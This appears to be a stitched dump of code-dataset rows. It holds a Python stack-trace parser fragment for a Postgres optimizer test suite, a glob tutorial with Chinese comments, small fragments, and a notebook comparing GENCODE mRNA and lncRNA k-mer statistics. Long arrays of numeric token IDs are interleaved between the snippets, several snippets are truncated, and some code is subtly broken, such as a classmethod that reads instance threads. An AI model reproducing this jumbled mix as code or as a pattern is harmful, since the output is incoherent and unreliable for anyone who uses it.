self.binary = 'postgres'
self.threads = []
self.text = ''
@classmethod
def parse(cls, type, dxl = None, text = None):
"""
Parse stack trace from a minidump or a text and return a
OptStacktrace object
@param type - 'dxl' or 'text' specifying where to look for a stack trace
@param dxl - location of the dxl file
@param text - string containing a stack trace
"""
if type != 'dxl' and type != 'text':
tinctest.logger.warning("Unknown source type %s. Returning no stack." %(type))
return None
if type == 'dxl':
return cls._parse_dxl_for_stack_trace(dxl)
if type == 'text':
return cls._parse_text_for_stack_trace(text)
@classmethod
def get_thread(self, number):
"""
Given a thread number, returns the corresponding OptSTacktraceThread object
"""
for thread in self.threads:
if thread.number == number:
return thread
return None
class OptStacktraceThread(object):
"""
Class representing one thread of a stack trace. Contains a list of OptStackFrame objects.
"""
@classmethod
def parse(cls, text, number):
"""
Parse a single thread's stack trace text and returns an OptStacktraceThread object
"""
thread = OptStacktraceThread()
thread.number = number
thread.text = text
# Get every line in the text and form a frame object
for line in text.splitlines():
thread.frames.append(OptStackFrame.parse(line))
return thread
def get_first_relevant_frame(self):
"""
Returns the first relevant frame in the stack trace. Relevance
here means the first non-gpos stack frame. We should refine this
when we encounter special cases. For the following stack:
1 0x000000000132f465 gpos::CException::Raise + 165
2 0x0000000001b9f148 gpdxl::CDXLUtils::PphdxlParseDXLFile + 888
3 0x000000000035450d COptTasks::PdrgPssLoad + 61,
this should return the second frame
"""
ret = False
for frame in self.frames:
if ret == True:
return frame
if 'gpos' in frame.function:
ret = True
# This means there was no frame with gpos functions and we return None
return None
def hash(self, number_of_frames):
"""
Return a hash of the top 'number_of_frames' of the stack trace.
"""
if len(self.frames) < number_of_frames:
number_of_frames = len(self.frames)
m = hashlib.md5()
for i in xrange(number_of_frames):
m.update(self.frames[i].text)
return m.hexdigest()
class OptStackFrame(object):
"""
Single stack frame element representing a single function call in a stack.
Each frame is assumed to be of the following format:
1 0x000000000132f465 gpos::CException::Raise + 165
"""
@classmethod
def parse(cls, text):
"""
Given a single line of stack trace, parses the string and returns an OptStackFrame object
"""
frame = OptStackFrame()
frame.text = text
frame_elements = text.split()
# Assuming the following format
# "1 0x000000000132f465 gpos::CException::Raise + 165""
# TODO - Check if we will have other formats
frame.function = frame_elements[2]
frame.number = int(frame_elements[0])
frame.address = frame_elements[1]
frame.line = int(frame_elements[4])
return frame
def get_owner(self, lookup_file = _DEFAULT_LOOKUP_FILE):
"""
By default, find the owner from a lookup file at function_owners.csv in $GPHOME/bin
"""
if self.function in self._owner_cache:
return self._owner_cache[self.function]
if not os.path.exists(lookup_file):
tinctest.logger.warning("Lookup file does not exist - " + lookup_file)
return ''
with open(lookup_file, 'r') as f:
for line in f:
fields = line.split(',')
owner = fields[2].strip()
function = fields[1].strip()
# Note that we also add the default namespace 'gpopt::' while looking up function_owners.csv
# because complexity.csv does not include namespace for functions in .cpp files.
if self.function == function or self.function == 'gpopt::' + function or self.function == 'gpdxl::' + function:
self._owner_cache[self.function] = owner
return owner.strip()
tinctest.logger.warning("Did not find function %s in the lookup file %s " %(self.function, lookup_file))
return ''
class OptimizerTestResult(_SQLTestCaseResult):
"""
A listener for OptimizerSQLTestCase that will collect mini dumps when a test case fails
"""
def addFailure(self, test, err):
"""
Collect mini dumps for test queries during a failure
"""
dxl_file = test._collect_mini_dump()
super(OptimizerTestResult, self).addFailure(test, err)
| [
37811,
198,
15269,
357,
34,
8,
5472,
12,
4626,
350,
452,
4997,
10442,
11,
3457,
13,
1439,
2489,
10395,
13,
198,
198,
1212,
1430,
290,
262,
19249,
5696,
389,
925,
1695,
739,
198,
1169,
2846,
286,
262,
739,
262,
24843,
13789,
11,
1062... | 2.335104 | 3,954 |
# -*- coding:utf-8 -*-
import glob
# 获取指定目录下的内容
# yijian = glob.glob(r"F:\*\*\*.docx")
# print(yijian)
"""
在python中,glob模块是用来查找匹配的文件的
在查找的条件中,需要用到Unix shell中的匹配规则:
* : 匹配所有
? : 匹配一个字符
*.* : 匹配如:[hello.txt,cat.xls,xxx234s.doc]
?.* : 匹配如:[1.txt,h.py]
?.gif: 匹配如:[x.gif,2.gif]
如果没有匹配的,glob.glob(path)将返回一个空的list:[]
"""
def get_all():
""" 获取目录下面所有的文件 """
return glob.glob(r"F:\PythonProject\*.*")
def get_myfile():
"""获取文件名为6个字符的文件"""
return glob.glob(r"F:\PythonProject\??????.txt")
def getsubfile():
"""获取子目录下的文件"""
return glob.glob(r"F:\PythonProject\*\*\**.txt")
if __name__=="__main__":
main() | [
2,
532,
9,
12,
19617,
25,
40477,
12,
23,
532,
9,
12,
198,
198,
11748,
15095,
198,
198,
2,
5525,
236,
115,
20998,
244,
162,
234,
229,
22522,
248,
33566,
106,
37605,
243,
10310,
233,
21410,
37863,
227,
22522,
117,
198,
2,
331,
2926,... | 1.243292 | 559 |
import numpy as np
'''
Problem 1.2
'''
'''
Problem 1.2
'''
'''
Problem 1.8
'''
| [
11748,
299,
32152,
355,
45941,
628,
198,
7061,
6,
198,
40781,
352,
13,
17,
198,
7061,
6,
198,
198,
7061,
6,
198,
40781,
352,
13,
17,
198,
7061,
6,
198,
198,
7061,
6,
198,
40781,
352,
13,
23,
198,
7061,
6,
628
] | 2 | 42 |
from instruction.event import _Instruction
from instruction.entity import *
CAMERA, PARTY0, PARTY1, PARTY2, PARTY3 = range(0x30, 0x35)
| [
6738,
12064,
13,
15596,
1330,
4808,
6310,
2762,
198,
6738,
12064,
13,
26858,
1330,
1635,
198,
198,
34,
2390,
46461,
11,
16652,
56,
15,
11,
16652,
56,
16,
11,
16652,
56,
17,
11,
16652,
56,
18,
796,
2837,
7,
15,
87,
1270,
11,
657,
... | 2.833333 | 48 |
import os
from .storage import Storage
| [
11748,
28686,
198,
198,
6738,
764,
35350,
1330,
20514,
198
] | 4 | 10 |
from sdk.color_print import c_print
from cloud_accounts import cld_migrate, cld_get, cld_compare, cld_update, cld_delete
def sync(tenant_sessions: list, addMode: bool, upMode: bool, delMode: bool, logger:object):
'''Update, add, or delete cloud accounts to normalize all tenants to be the same as the source tenant'''
added_cloud = []
updated_cloud = []
deleted_cloud = []
if addMode:
#Migrate missing cloud accounts first using migrate module
added_cloud = cld_migrate.migrate(tenant_sessions, logger)
if upMode or delMode:
#Get all cloud accounts from both tenants
tenant_accounts = []
for i in range(len(tenant_sessions)):
accounts = cld_get.get_names(tenant_sessions[i], logger)
tenant_accounts.append(accounts)
#Get the full information for each cloud account
tenants_cloud_accounts = []
for i in range(len(tenant_accounts)):
cloud_accounts_to_upload = []
for j in range(len(tenant_accounts[i])):
account = tenant_accounts[i][j]
ret = cld_get.get_all_info(tenant_sessions[i], account, logger)#get info from original tenant
if ret != '':
cloud_accounts_to_upload.append(ret)
tenants_cloud_accounts.append(cloud_accounts_to_upload)
#Sync each tenants cloud accounts
source_tenant_cloud_accounts = tenants_cloud_accounts[0]
clone_tenants_cloud_accounts = tenants_cloud_accounts[1:]
cln_tenant_sessions = tenant_sessions[1:]
for index in range(len(clone_tenants_cloud_accounts)):
if upMode:
accounts_to_update = cld_compare.get_accounts_to_update(source_tenant_cloud_accounts, clone_tenants_cloud_accounts[index], tenant_sessions[0], cln_tenant_sessions[index], logger)
updated = cld_update.update_accounts(cln_tenant_sessions[index], accounts_to_update, logger)
updated_cloud.append(updated)
if delMode:
accounts_to_delete = cld_compare.get_accounts_to_delete(source_tenant_cloud_accounts, clone_tenants_cloud_accounts[index])
deleted = cld_delete.delete_accounts(cln_tenant_sessions[index], accounts_to_delete, logger)
deleted_cloud.append(deleted)
else:
deleted_cloud.append(0)
return added_cloud, updated_cloud, deleted_cloud, {}
if __name__ == '__main__':
from sdk import load_config
#Generate a API session for each tenant
tenant_sessions = load_config.load_config_create_sessions()
sync(tenant_sessions, True, True, True)
| [
6738,
264,
34388,
13,
8043,
62,
4798,
1330,
269,
62,
4798,
198,
6738,
6279,
62,
23317,
82,
1330,
269,
335,
62,
76,
42175,
11,
269,
335,
62,
1136,
11,
269,
335,
62,
5589,
533,
11,
269,
335,
62,
19119,
11,
269,
335,
62,
33678,
198... | 2.32526 | 1,156 |
from darwinian_shift.utils.gene_sequence_functions import *
from tests.conftest import EXON_FILE, REFERENCE_FASTA_FILE
import pickle
import os
import numpy as np
from pandas.testing import assert_frame_equal
import pytest
FILE_DIR = os.path.dirname(os.path.realpath(__file__))
@pytest.mark.parametrize("gene,transcript",[("KEAP1", None), (None, "ENST00000171111")])
| [
6738,
288,
283,
5404,
666,
62,
30846,
13,
26791,
13,
70,
1734,
62,
43167,
62,
12543,
2733,
1330,
1635,
198,
6738,
5254,
13,
1102,
701,
395,
1330,
7788,
1340,
62,
25664,
11,
4526,
24302,
18310,
62,
37,
1921,
5603,
62,
25664,
198,
117... | 2.761194 | 134 |
for _ in range(int(input())):
n = int(input())
s = input()
alpha = set(s)
ans = n
countImpossible = 0
for i in alpha:
curr = 0
lb, ub = 0, n - 1
while lb < ub:
if s[lb] == s[ub]:
lb += 1
ub -= 1
continue
else:
if s[lb] == i:
lb += 1
curr += 1
continue
elif s[ub] == i:
ub -= 1
curr += 1
continue
else:
curr = n + 1
lb += 1
ub -= 1
continue
dup = s
dup = dup.replace(i, '')
if dup != dup[::-1]:
countImpossible += 1
ans = min(ans, curr)
if countImpossible == len(alpha):
ans = -1
print(ans) | [
1640,
4808,
287,
2837,
7,
600,
7,
15414,
28955,
2599,
198,
220,
220,
220,
299,
796,
493,
7,
15414,
28955,
198,
220,
220,
220,
264,
796,
5128,
3419,
198,
220,
220,
220,
17130,
796,
900,
7,
82,
8,
198,
220,
220,
220,
9093,
796,
29... | 1.515702 | 605 |
'''
Uses [[https://github.com/karlicoss/HPI][HPI]] dogsheep module to import
Hacker News items.
'''
import textwrap
from promnesia.common import Visit, Loc, Results
| [
7061,
6,
198,
5842,
274,
16410,
5450,
1378,
12567,
13,
785,
14,
21070,
677,
793,
14,
39,
11901,
7131,
39,
11901,
11907,
6844,
258,
538,
8265,
284,
1330,
198,
39,
10735,
3000,
3709,
13,
198,
7061,
6,
198,
198,
11748,
2420,
37150,
198... | 3 | 56 |
from dataclasses import dataclass, field
from typing import List, Dict, Any, Tuple
from yamldataclassconfig.config import YamlDataClassConfig
@dataclass
@dataclass
@dataclass
@dataclass
@dataclass
@dataclass
@dataclass
| [
6738,
4818,
330,
28958,
1330,
4818,
330,
31172,
11,
2214,
198,
6738,
19720,
1330,
7343,
11,
360,
713,
11,
4377,
11,
309,
29291,
198,
198,
6738,
331,
321,
335,
265,
330,
31172,
11250,
13,
11250,
1330,
14063,
75,
6601,
9487,
16934,
628,... | 2.785714 | 84 |
import logging
import numpy
from PIL import Image
from dirs import dest
log = logging.getLogger()
| [
11748,
18931,
198,
198,
11748,
299,
32152,
198,
6738,
350,
4146,
1330,
7412,
198,
6738,
288,
17062,
1330,
2244,
198,
6404,
796,
18931,
13,
1136,
11187,
1362,
3419,
628,
198
] | 3.366667 | 30 |
from flask import request, jsonify
from app import app, db
from app.models import Subject, SubjectSchema, SubjectsSchema
@app.route('/subjects', methods=['get'])
@app.route('/subjects', methods=['post'])
| [
6738,
42903,
1330,
2581,
11,
33918,
1958,
198,
6738,
598,
1330,
598,
11,
20613,
198,
6738,
598,
13,
27530,
1330,
15540,
11,
15540,
27054,
2611,
11,
43815,
27054,
2611,
198,
198,
31,
1324,
13,
38629,
10786,
14,
32796,
82,
3256,
5050,
2... | 3.21875 | 64 |
#----------------------------------------------
# Teste de cálculo e tomada de decisão
#
# Conceito A = nota >= 9 and < 10
# Conceito B = nota >= 8 and 8,99999
# Conceito C = nota >= 7 and 7,99999
# Conceito D = nota >= 6 and 6,99999
# Conceito R = nota < 5
#
#----------------------------------------------
import os
from termcolor import colored
main() | [
198,
2,
3880,
26171,
198,
2,
6208,
68,
390,
269,
6557,
75,
3129,
78,
304,
16667,
4763,
390,
875,
271,
28749,
198,
2,
198,
2,
44530,
10094,
317,
796,
407,
64,
18189,
860,
290,
1279,
838,
198,
2,
44530,
10094,
347,
796,
407,
64,
1... | 3.256881 | 109 |
import pytest
from briefcase.commands import NewCommand
from briefcase.commands.base import full_kwargs
class DummyNewCommand(NewCommand):
"""
A dummy new command that doesn't actually do anything.
It only serves to track which actions would be performend.
"""
description = 'Dummy new command'
@pytest.fixture
| [
11748,
12972,
9288,
198,
198,
6738,
4506,
7442,
13,
9503,
1746,
1330,
968,
21575,
198,
6738,
4506,
7442,
13,
9503,
1746,
13,
8692,
1330,
1336,
62,
46265,
22046,
628,
198,
4871,
360,
13513,
3791,
21575,
7,
3791,
21575,
2599,
198,
220,
... | 3.326733 | 101 |
from ma import ma
from models.category import CategoryModel
from schemas.market import MarketSchema
| [
6738,
17266,
1330,
17266,
198,
6738,
4981,
13,
22872,
1330,
21743,
17633,
198,
6738,
3897,
5356,
13,
10728,
1330,
5991,
27054,
2611,
198
] | 4.347826 | 23 |
# BSD 3-Clause License
#
# Copyright (c) 2020, Hyuk Ko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import locBaker
reload(locBaker)
try:
lb.close()
lb.deleteLater()
except:
pass
lb = locBaker.LocBaker()
lb.show()
"""
try:
from PySide import QtGui, QtCore
import PySide.QtGui as QtWidgets
import shiboken
except ImportError:
from PySide2 import QtGui, QtCore, QtWidgets
import shiboken2 as shiboken
import maya.cmds as mc
import maya.OpenMaya as om
import maya.OpenMayaUI as omui
import traceback
from functools import wraps
# Decorator for undo support.
if __name__ == "__main__":
try:
lb.close()
lb.deleteLater()
except:
pass
lb = LocBaker()
lb.show()
| [
2,
347,
10305,
513,
12,
2601,
682,
13789,
198,
2,
198,
2,
15069,
357,
66,
8,
12131,
11,
6707,
2724,
17634,
198,
2,
1439,
2489,
10395,
13,
198,
2,
198,
2,
2297,
396,
3890,
290,
779,
287,
2723,
290,
13934,
5107,
11,
351,
393,
1231... | 3.079498 | 717 |
""" Stuff to generate and modify images """
# pylint: disable=line-too-long, logging-fstring-interpolation, dangerous-default-value, logging-not-lazy
from datetime import timedelta, datetime as dt
import sys
import glob
import logging
import argparse
from pathlib import Path
import os
from dateutil.rrule import rrule, SECONDLY
from PIL import Image, ImageColor, ImageDraw, ImageFont
from tmv.video import SliceType, VideoMaker
from tmv.util import LOG_FORMAT, LOG_LEVELS, dt2str, next_mark, prev_mark, strptimedelta
from tmv.config import FONT_FILE_IMAGE, HH_MM
LOGGER = logging.getLogger("tmv.images")
try:
from ascii_graph import Pyasciigraph # optional, for 'graph'
except ImportError as exc:
# print(exc)
pass
def stamp(filename, ith):
""" Draw a moving circle on the image for continuity in video checking """
assert os.path.exists(filename)
img = Image.open(filename)
draw = ImageDraw.Draw(img)
font = ImageFont.truetype(FONT_FILE_IMAGE, 20)
draw.pieslice([(0, 0), (100, 100)], ith % 360, ith % 360, fill=None, outline=None)
draw.arc([(0, 0), (100, 100)], 0, 360)
w, h = img.size
# draw.text(( (self.ith*10) % w, h - 10), "*", (255, 255, 255), font=font)
draw.text((w - 40, h - 40), str(ith), (255, 255, 255), font=font)
draw.text((w - 300, h - 60), filename, (255, 255, 255), font=font)
LOGGER.debug("Stamping: {} : {}x{}".format(filename, w, h))
img.save(filename, )
def rename_to_exif_datetime(filename, pattern="%Y-%m-%dT%H-%M-%S"):
""" Get the exif date and rename the file to a pattern based on that
Args:
filename (str): [description]
pattern (str, optional): Rename to this pattern with exif date
"""
dtt = exif_datetime_taken(filename)
date_filename = os.path.join(os.path.dirname(filename),
dtt.strftime(pattern) + os.path.splitext(filename)[1])
LOGGER.debug("Renaming {} to {}".format(filename, date_filename))
os.rename(filename, date_filename)
def graph_intervals(tl_videos, interval=timedelta(hours=1)):
"""
Plot ascii frequency of photos per bin
"""
bins = {}
for video in tl_videos:
# round bin start
start = prev_mark(interval, video.start)
end = next_mark(interval, video.end)
# generate a list of marks
video_extents = list(rrule(SECONDLY, dtstart=start, until=end, interval=int(interval.total_seconds())))
for bin_start in video_extents:
images_in_slice = [im for im in video.images if bin_start <= im.taken < bin_start + interval]
bins[bin_start] = len(images_in_slice)
graphable = []
for h in sorted(bins):
# print("{}:{}".format(h,freq[h]))
graphable.append(tuple((h.isoformat(), bins[h])))
# print (graphable)
graph = Pyasciigraph()
for line in graph.graph('Frequency per {}'.format(interval), graphable):
print(line)
class Overlay():
""" Put pixels on an image """
class Label(Overlay):
""" Write name of image on the bottom """
class CalenderOverlay(Overlay):
"""
Add an "+" on a 'calendar' graph:
D1, D2, D3 ... D365
H0
H1 +
H2
...
H23
"""
def generate_cal_cross_images(output=Path("."), period=timedelta(days=365), step=timedelta(hours=1)):
""" One per hour with a "x" and label"""
start = dt(2000, 1, 1, 0, 0, 0)
end = start + period
# generate marks at regular intervals
time_range = list(rrule(SECONDLY, dtstart=start, until=end, interval=int(step.total_seconds())))
for instant in time_range:
f = output / Path(dt2str(instant) + ".jpg")
im = Image.new("RGB", (320, 200))
overlay = CalenderOverlay(im, instant)
overlay.apply()
overlay = Label(im, str(f))
overlay.apply()
im.save(f)
im.close()
def exif_datetime_taken(fn):
"""returns the image date from image (if available)
https://orthallelous.wordpress.com/2015/04/19/extracting-date-and-time-from-images-with-python/"""
std_fmt = '%Y:%m:%d %H:%M:%S.%f'
# for subsecond prec, see doi.org/10.3189/2013JoG12J126 , sect. 2.2, 2.3
tags = [(36867, 37521), # (DateTimeOriginal, SubsecTimeOriginal)
(36868, 37522), # (DateTimeDigitized, SubsecTimeDigitized)
(306, 37520), ] # (DateTime, SubsecTime)
exif = Image.open(fn)._getexif() # pylint: disable=protected-access
print(exif)
for t in tags:
dat = exif.get(t[0])
subsub = exif.get(t[1], 0)
# PIL.PILLOW_VERSION >= 3.0 returns a tuple
dat = dat[0] if isinstance(dat,tuple) else dat
subsub = subsub[0] if isinstance(subsub, tuple) else subsub
if dat is not None:
break
if dat is None:
return None
full = '{}.{}'.format(dat, subsub)
T = dt.strptime(full, std_fmt)
#T = time.mktime(time.strptime(dat, '%Y:%m:%d %H:%M:%S')) + float('0.%s' % sub)
return T
# pylint: disable=dangerous-default-value,
| [
37811,
27864,
284,
7716,
290,
13096,
4263,
37227,
198,
2,
279,
2645,
600,
25,
15560,
28,
1370,
12,
18820,
12,
6511,
11,
18931,
12,
69,
8841,
12,
3849,
16104,
341,
11,
4923,
12,
12286,
12,
8367,
11,
18931,
12,
1662,
12,
75,
12582,
... | 2.338873 | 2,166 |
user = None | [
7220,
796,
6045
] | 3.666667 | 3 |
from .interval import Interval
from datetime import date, datetime
from .interval import Interval, SpikeStatus, ChannelType
| [
6738,
764,
3849,
2100,
1330,
4225,
2100,
198,
6738,
4818,
8079,
1330,
3128,
11,
4818,
8079,
198,
6738,
764,
3849,
2100,
1330,
4225,
2100,
11,
26309,
19580,
11,
11102,
6030,
628
] | 4.032258 | 31 |
import sys
from glyphview import ( GlyphView, GlyphScene, GlyphItem )
from PyQt4.QtGui import ( QApplication, QDialog, QPen, QBrush, QHBoxLayout,
QPushButton, QVBoxLayout, QGraphicsRectItem, QGraphicsSimpleTextItem,
QPixmap, QFileDialog, QPainter, QComboBox, QSpinBox )
from PyQt4.QtCore import ( QRectF, QString, QPointF, SIGNAL, SLOT, Qt, pyqtSlot, QSize)
from dialogs import ( centreTextLabelBelow )
import glyphdesigns as designs
#noinspection PyOldStyleClasses
# end class
# end def
if __name__ == "__main__":
main() # run the main application window | [
11748,
25064,
198,
198,
6738,
25874,
1177,
1330,
357,
27949,
746,
7680,
11,
27949,
746,
36542,
11,
27949,
746,
7449,
1267,
198,
198,
6738,
9485,
48,
83,
19,
13,
48,
83,
8205,
72,
1330,
357,
1195,
23416,
11,
1195,
44204,
11,
1195,
25... | 2.454545 | 253 |
from polyphony import testbench
@testbench
test()
| [
6738,
7514,
23021,
1330,
1332,
26968,
198,
198,
31,
9288,
26968,
198,
198,
9288,
3419,
198
] | 3.25 | 16 |
tabuada = int(input('Qual tabuada queres saber?: '))
for cont in range(0, 11):
print('{} x {} = {}'.format(tabuada,cont,tabuada*cont))
| [
8658,
84,
4763,
796,
493,
7,
15414,
10786,
46181,
7400,
84,
4763,
8358,
411,
17463,
263,
27514,
705,
4008,
201,
198,
1640,
542,
287,
2837,
7,
15,
11,
1367,
2599,
201,
198,
220,
220,
220,
3601,
10786,
90,
92,
2124,
23884,
796,
23884,... | 2.366667 | 60 |
from collections import Counter
import webcolors
CSS3_COLORS = webcolors.CSS3_NAMES_TO_HEX.keys()
| [
6738,
17268,
1330,
15034,
198,
198,
11748,
3992,
4033,
669,
628,
198,
49155,
18,
62,
25154,
20673,
796,
3992,
4033,
669,
13,
49155,
18,
62,
45,
29559,
62,
10468,
62,
39,
6369,
13,
13083,
3419,
628,
628
] | 2.810811 | 37 |
from . import base as baseline
from . import conf_proposal
from . import conf_proposal_patch
configurations = {}
configurations['baseline'] = baseline
configurations['conf_proposal'] = conf_proposal
configurations['conf_proposal_patch'] = conf_proposal_patch
| [
6738,
764,
1330,
2779,
355,
14805,
198,
6738,
764,
1330,
1013,
62,
1676,
40007,
198,
6738,
764,
1330,
1013,
62,
1676,
40007,
62,
17147,
628,
198,
11250,
20074,
796,
23884,
198,
198,
11250,
20074,
17816,
12093,
4470,
20520,
796,
14805,
1... | 3.589041 | 73 |
#!/usr/bin/env python
# coding: utf-8
# # Analyzer
#
# Statistically, visually, and through machine learning compare mRNA and lncRNA sequences from GENCODE v38.
#
# Assume the user downloaded files from GENCODE v38 [FTP](http://ftp.ebi.ac.uk/pub/databases/gencode/Gencode_human/release_38/)
# to a subdirectory called data.
# ## Import Dependencies
#
# In[2]:
import numpy as np
import matplotlib.pyplot as plt
import random
import pandas as pd
import gzip
from scipy.stats import chisquare, kstest
import sys
from sklearn.utils import shuffle
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.metrics import roc_curve
from sklearn.metrics import roc_auc_score
from keras.models import Sequential
from keras.layers import Dense,Embedding,Dropout
from keras.layers import Flatten,TimeDistributed
from keras.losses import BinaryCrossentropy
from keras.callbacks import ModelCheckpoint
from keras.models import load_model
try:
from google.colab import drive
IN_COLAB = True
print("On Google CoLab, mount cloud-local file, get our code from GitHub.")
PATH='/content/drive/'
#drive.mount(PATH,force_remount=True) # hardly ever need this
drive.mount(PATH) # Google will require login credentials
DATAPATH=PATH+'My Drive/data/' # must end in "/"
import requests
s = requests.get('https://raw.githubusercontent.com/ShepherdCode/Soars2021/master/SimTools/RNA_describe.py')
with open('RNA_describe.py', 'w') as f:
f.write(s.text) # writes to cloud local, delete the file later?
s = requests.get('https://raw.githubusercontent.com/ShepherdCode/Soars2021/master/SimTools/GenCodeTools.py')
with open ('GenCodeTools.py', 'w') as f:
f.write(s.text)
s = requests.get('https://raw.githubusercontent.com/ShepherdCode/Soars2021/master/SimTools/plot_generator.py')
with open('plot_generator.py', 'w') as f:
f.write(s.text)
s = requests.get('https://raw.githubusercontent.com/ShepherdCode/Soars2021/master/SimTools/KmerTools.py')
with open('KmerTools.py', 'w') as f:
f.write(s.text)
from KmerTools import KmerTools
from RNA_describe import *
from GenCodeTools import *
from plot_generator import *
except:
print("CoLab not working. On my PC, use relative paths.")
IN_COLAB = False
DATAPATH='../data/' # must end in "/"
sys.path.append("..") # append parent dir in order to use sibling dirs
from SimTools.RNA_describe import *
from SimTools.GenCodeTools import *
from SimTools.plot_generator import *
from SimTools.KmerTools import KmerTools
MODELPATH="BestModel" # saved on cloud instance and lost after logout
#MODELPATH=DATAPATH+MODELPATH # saved on Google Drive but requires login
if not assert_imported_RNA_describe():
print("ERROR: Cannot use RNA_describe.")
# ## Load GENCODE Data
# Loads GENCODE v38 data.
#
# Filters out mRNA sequences based on UTR check.
# In[3]:
PC_FILENAME='gencode.v38.pc_transcripts.fa.gz'
NC_FILENAME='gencode.v38.lncRNA_transcripts.fa.gz'
PC_FULLPATH=DATAPATH+PC_FILENAME
NC_FULLPATH=DATAPATH+NC_FILENAME
loader=GenCodeLoader()
loader.set_label(1)
loader.set_check_list(None)
loader.set_check_utr(True)
pcdf=loader.load_file(PC_FULLPATH)
print("PC seqs loaded:",len(pcdf))
loader.set_label(0)
loader.set_check_list(None)
loader.set_check_utr(False)
ncdf=loader.load_file(NC_FULLPATH)
print("NC seqs loaded:",len(ncdf))
# ## Process Sequences
#
# Generate Sample of GENCODE Data Set
#
# Apply Length Constraints
#
# Validate Sequences
# In[4]:
APPLY_SUBSET = True #Option to subset the data
MINIMUM_SEQUENCE_LENGTH = 200 #Minimum exclusive length to filter out sequences by
MAXIMUM_SEQUENCE_LENGTH = 4000 #Maximum inclusive length to filter out sequences by
SAMPLE_FRACTION = 1 #What fraction of the GenCode data set to take a sample of
REPRODUCABILITY_SEED = 314159 #Use to reproduce random sampling
# In[5]:
if APPLY_SUBSET:
pcdf = pcdf.sample(frac=SAMPLE_FRACTION, random_state=REPRODUCABILITY_SEED)
ncdf = ncdf.sample(frac=SAMPLE_FRACTION, random_state=REPRODUCABILITY_SEED)
print('PC sample size:', len(pcdf))
print('NC sample size:', len(ncdf))
# Apply Length Constraints
# In[6]:
# In[7]:
pc_sequences = pcdf['sequence'].tolist()
nc_sequences = ncdf['sequence'].tolist()
if APPLY_SUBSET:
pc_sequences = subset_list_by_len_bounds(pc_sequences, MINIMUM_SEQUENCE_LENGTH, MAXIMUM_SEQUENCE_LENGTH)
nc_sequences = subset_list_by_len_bounds(nc_sequences, MINIMUM_SEQUENCE_LENGTH, MAXIMUM_SEQUENCE_LENGTH)
print('PC seqs in length range','('+str(MINIMUM_SEQUENCE_LENGTH),'-',str(MAXIMUM_SEQUENCE_LENGTH)+'):', len(pc_sequences))
print('NC seqs in length range','('+str(MINIMUM_SEQUENCE_LENGTH),'-',str(MAXIMUM_SEQUENCE_LENGTH)+'):', len(nc_sequences))
#Garbage collection
pcdf = None
ncdf = None
# Validate Sequences
# In[8]:
def valid_sequence(seq):
"""
Checks if the given sequences if valid.
"""
for chr in seq:
if not (chr == 'A' or chr == 'C' or chr == 'G' or chr == 'T'):
return False
return True
def validate_sequences(sequences):
"""
Validate the given list of sequences
"""
i = 0
while i < len(sequences):
if valid_sequence(sequences[i]):
i += 1
else:
sequences.remove(sequences[i])
validate_sequences(pc_sequences)
validate_sequences(nc_sequences)
print('Valid PC seqs:', len(pc_sequences))
print('Valid NC seqs:', len(nc_sequences))
# ## Generate Simulated Sequences
# In[9]:
NUM_FAKE_SEQS_PER_LENGTH = 15
random.seed(REPRODUCABILITY_SEED)
fake_sequences = []
for length in range(MINIMUM_SEQUENCE_LENGTH + 1, MAXIMUM_SEQUENCE_LENGTH + 1):
for size in range(0, NUM_FAKE_SEQS_PER_LENGTH):
sequence = ''.join(random.choices(['A', 'C', 'G', 'T'], k=length))
fake_sequences.append(sequence)
print('Simulated Sequences:', len(fake_sequences))
# ## Generate Statistics
#
# Using KmerTools to get the K-mer counts upto 3.
# It returns the value in Dictionary form. (Key-Value Pair)
# In[10]:
MAX_K = 3
tool = KmerTools()
pc_counts = tool.make_dict_upto_K(MAX_K)
for sample in pc_sequences:
tool.update_count_one_K(pc_counts,MAX_K,sample,True)
tool.harvest_counts_from_K(pc_counts,MAX_K)
pc_freqs = tool.count_to_frequency(pc_counts,MAX_K)
nc_counts = tool.make_dict_upto_K(MAX_K)
for sample in nc_sequences:
tool.update_count_one_K(nc_counts,MAX_K,sample,True)
tool.harvest_counts_from_K(nc_counts,MAX_K)
nc_freqs = tool.count_to_frequency(nc_counts,MAX_K)
fake_counts = tool.make_dict_upto_K(MAX_K)
for sample in fake_sequences:
tool.update_count_one_K(fake_counts, MAX_K, sample, True)
tool.harvest_counts_from_K(fake_counts, MAX_K)
fake_freqs = tool.count_to_frequency(fake_counts, MAX_K)
#Garbage collection
pc_counts = None
nc_counts = None
fake_counts = None
# In[11]:
ONE_MER_MIN = 0
ONE_MER_MAX = 4**1
TWO_MER_MIN = 4**1
TWO_MER_MAX = 4**2 + 4**1
THREE_MER_MIN = 4**2 + 4**1
THREE_MER_MAX = 4**3 + 4**2 + 4**1
one_mer_keys = list(pc_freqs.keys())[ONE_MER_MIN:ONE_MER_MAX]
two_mer_keys = list(pc_freqs.keys())[TWO_MER_MIN:TWO_MER_MAX]
three_mer_keys = list(pc_freqs.keys())[THREE_MER_MIN:THREE_MER_MAX]
pc_freqs = list(pc_freqs.values())
nc_freqs = list(nc_freqs.values())
